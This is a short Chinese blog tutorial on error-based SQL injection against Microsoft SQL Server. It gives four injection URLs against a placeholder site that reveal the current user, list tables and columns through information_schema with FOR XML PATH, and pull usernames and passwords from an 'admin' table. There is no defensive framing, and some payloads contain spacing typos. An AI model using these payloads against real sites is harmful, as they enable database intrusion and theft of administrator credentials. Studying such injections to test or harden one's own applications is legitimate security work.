WEB安全之SQL注入:sqlserver 快速爆表、爆列、爆数据

摘要

SQL_SERVER 中每个数据库中都有 视图->系统视图


在这个下面都有很多关于这个库的表,表里面存放了很多关于这个库的信息。


COLUMNS 列


TABLES 表


1.jpg

1、查询当前用户



http://www.demo1.com/index.aspx?id=1 anduser_name()>1

2、根据当前用户爆出所有表


http://www.demo1.com/index.aspx?id=1and(select TABLE_NAME  from  information_schema.TABLES   where TABLE_SCHEMA='dbo' FOR XML PATH)>1



3、爆出所有的列

http://www.demo1.com/index.aspx?id=1and(select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME='admin'FOR XML PATH)>1




4、爆出数据


http://www.demo1.com/index.aspx?id=1and  ( select username,password fromadmin FOR XML PATH)>1

3.jpg

目前评论:0 条

发表评论